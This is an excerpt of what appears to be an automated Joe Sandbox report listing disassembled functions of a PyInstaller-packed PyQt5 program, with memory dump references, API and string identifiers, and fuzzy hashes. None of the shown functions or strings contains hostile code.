                                                                                                                                                                                                                                          Function 00007FF89D99BEB0 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 219COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?drawPainter@@Points@Tuple_$Size$Point@@$DeallocPoint$F@@@ItemPolygonPolygon@@@
                                                                                                                                                                                                                                          • String ID: BJ0W$BJ8W$BJ9$QPainter$drawPoints$drawPoints(self, points: QPolygonF)drawPoints(self, points: QPolygon)drawPoints(self, points: Optional[PyQt5.sip.array[Union[QPointF, QPoint]]])drawPoints(self, point: Optional[Union[QPointF, QPoint]], *args: Union[QPointF, QPoint])drawPoints(self, points:
                                                                                                                                                                                                                                          • API String ID: 2352560762-2263801330
                                                                                                                                                                                                                                          • Opcode ID: 07e88b2f091a9ea49d213234de3db452ac8d20a710bd02d5bca34276e61ffb26
                                                                                                                                                                                                                                          • Instruction ID: 2fe4751a5d9e7db8078b14bbad75e0f11ee6f3436aa05748172435b0e87c9d3c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07e88b2f091a9ea49d213234de3db452ac8d20a710bd02d5bca34276e61ffb26
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30C1ED37A19B4689EB609F61E8840AD77B4FB48BD8B405136EE8E43768EF3CE154C744
                                                                                                                                                                                                                                          Function 00007FF89D96A0F0 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 121threadCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Eval_Thread$?load@Bool_DeallocFromLongPicture@@RestoreSave$Device@@String@@
                                                                                                                                                                                                                                          • String ID: BJ1|AA$BJ8|AA$QPicture$load$load(self, dev: Optional[QIODevice], format: Optional[str] = None) -> boolload(self, fileName: Optional[str], format: Optional[str] = None) -> bool
                                                                                                                                                                                                                                          • API String ID: 2031798773-2951445728
                                                                                                                                                                                                                                          • Opcode ID: 63fe89bb60495de7705d6b3ee5c53262279b7ffc0e7db643a7427ff10008a9fe
                                                                                                                                                                                                                                          • Instruction ID: ec47273cca4dcc36e5843a184bae796fed838cf8cacb304c1205e0c771a71486
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63fe89bb60495de7705d6b3ee5c53262279b7ffc0e7db643a7427ff10008a9fe
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C951BC3760AF41D9DB609F25E8851A973E8FB48BD4F410136EA8E43B68EF38E565C304
                                                                                                                                                                                                                                          Function 00007FF89D975F10 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • element %zd has type '%s' but 'QFontDatabase.WritingSystem' is expected, xrefs: 00007FF89D976210
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Sequence_$?detach_grow@CheckData@1@Data@@Err_FlagsItemListOccurredSizeType_
                                                                                                                                                                                                                                          • String ID: element %zd has type '%s' but 'QFontDatabase.WritingSystem' is expected
                                                                                                                                                                                                                                          • API String ID: 3772155008-1695380754
                                                                                                                                                                                                                                          • Opcode ID: 1148263e027fde29fbc7795b4cbce87eadaa7c1c7006bc26e05b6af7d4fc637e
                                                                                                                                                                                                                                          • Instruction ID: 10688e3ab9973c36f034fd8c1532a380400189959dd0e5cfa3133208fe77bf98
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1148263e027fde29fbc7795b4cbce87eadaa7c1c7006bc26e05b6af7d4fc637e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CA16A33A08A4286EBA09F15E44936D77A1FB89FD4F848135DA8E8B754EF3CE456C704
                                                                                                                                                                                                                                          Function 00007FF89ECA11C0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 153COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2747791894.00007FF89ECA1000.00000020.00000001.01000000.00000020.sdmp, Offset: 00007FF89ECA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747637090.00007FF89ECA0000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747911281.00007FF89ECA6000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747911281.00007FF89ECEA000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747911281.00007FF89ECF8000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747911281.00007FF89ED47000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2748309003.00007FF89ED4A000.00000004.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2748347304.00007FF89ED4C000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89eca0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CompareStringUnicode_With$MallocMem_SubtypeType_
                                                                                                                                                                                                                                          • String ID: NFC$NFD$NFKC$NFKD$invalid normalization form
                                                                                                                                                                                                                                          • API String ID: 2156454041-3528878251
                                                                                                                                                                                                                                          • Opcode ID: da3b54f35a8fb496e7d97c3fec9d3f2a0cbd8ed79af4ca103da2bfe7283e7162
                                                                                                                                                                                                                                          • Instruction ID: bb9705ee41797de125db4941f6c8588758ba22ceb59f1edf5c240e43b1bb7dfd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da3b54f35a8fb496e7d97c3fec9d3f2a0cbd8ed79af4ca103da2bfe7283e7162
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E05151A1A3C65342FB748B6595D467A6F92AF42FC8F045531EACE87B81DE2CF501C720
                                                                                                                                                                                                                                          Function 00007FF89D9ADE30 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Array@@BytePoint@@@@Vector@$??0?$?begin@?$?receivers@FromLongLong_Object@@Point@@
                                                                                                                                                                                                                                          • String ID: BP0$QTextFrame$pyqt5_get_signal_signature$receivers$receivers(self, signal: PYQT_SIGNAL) -> int
                                                                                                                                                                                                                                          • API String ID: 842024227-1020384895
                                                                                                                                                                                                                                          • Opcode ID: 5aad8c7ca268afb6cb2a5fb358e8c423fe8b1d7609f29877a1444a56bebf5628
                                                                                                                                                                                                                                          • Instruction ID: 263d511ac36eaab3eff94b079ef59c3925935d70e4ef082946749d71ceaf090c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5aad8c7ca268afb6cb2a5fb358e8c423fe8b1d7609f29877a1444a56bebf5628
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F31FB73A09A4692EB209F25E8491AA33E5FB44F95B914132DA8E43364FF3CF959C704
                                                                                                                                                                                                                                          Function 00007FF89D937DE0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Array@@BytePoint@@@@Vector@$??0?$?begin@?$?receivers@FromLongLong_Object@@Point@@
                                                                                                                                                                                                                                          • String ID: BP0$QIntValidator$pyqt5_get_signal_signature$receivers$receivers(self, signal: PYQT_SIGNAL) -> int
                                                                                                                                                                                                                                          • API String ID: 842024227-771453059
                                                                                                                                                                                                                                          • Opcode ID: 4db83b436f92d119fbc921852f0b2cb41d862c6f5ce2dd156cbf42960498a7ca
                                                                                                                                                                                                                                          • Instruction ID: 889b04d02ad126e814c98c06a07f7364691db83762a4705318c6682d8bcf56aa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4db83b436f92d119fbc921852f0b2cb41d862c6f5ce2dd156cbf42960498a7ca
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC31FC37A08A06C2EB209B25E8895B973E5FB44F95B914132DA8E42370FF3CF959C704
                                                                                                                                                                                                                                          Function 00007FF7124F2180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                          • String ID: P%
                                                                                                                                                                                                                                          • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                          • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                          • Instruction ID: fac39cf6d3b0a346d1e0cf02b35199e6441f402d3e6771e2ac713e2d202d3416
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9551F726604BA186D6349F26F4581BAF7A1F798B61F004121EFDE43694EF7CD049DB20
                                                                                                                                                                                                                                          Function 00007FF7124F81D0 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 82COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7124F45F4,00000000,00007FF7124F1985), ref: 00007FF7124F93C9
                                                                                                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(?,00007FF7124F86B7,?,?,00000000,00007FF7124F3CBB), ref: 00007FF7124F822C
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F2810: MessageBoxW.USER32 ref: 00007FF7124F28EA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                          • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                          • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                          • Opcode ID: afd584be0f0c6cf4fdafb40c90c8fbd83afcdccf603674318d77e8228e9b29d1
                                                                                                                                                                                                                                          • Instruction ID: 147ced118033e16c8bd0d7b7920fa7b5c8e5ab750457864cd3172190355da8aa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: afd584be0f0c6cf4fdafb40c90c8fbd83afcdccf603674318d77e8228e9b29d1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 82316111B29E5241FB50FB28D8916BAE250AFC47A0FC14435EE0E4A6D5EEECE81CC720
                                                                                                                                                                                                                                          Function 00007FF89D9A5E60 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 169COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?drawTiledPixmap@QPainter@@QEAAXAEBVQRectF@@AEBVQPixmap@@AEBVQPointF@@@Z.QT5GUI ref: 00007FF89D9A5F3A
                                                                                                                                                                                                                                          • ?drawTiledPixmap@QPainter@@QEAAXAEBVQRect@@AEBVQPixmap@@AEBVQPoint@@@Z.QT5GUI ref: 00007FF89D9A601E
                                                                                                                                                                                                                                          • ?drawTiledPixmap@QPainter@@QEAAXAEBVQRectF@@AEBVQPixmap@@AEBVQPointF@@@Z.QT5GUI ref: 00007FF89D9A6132
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
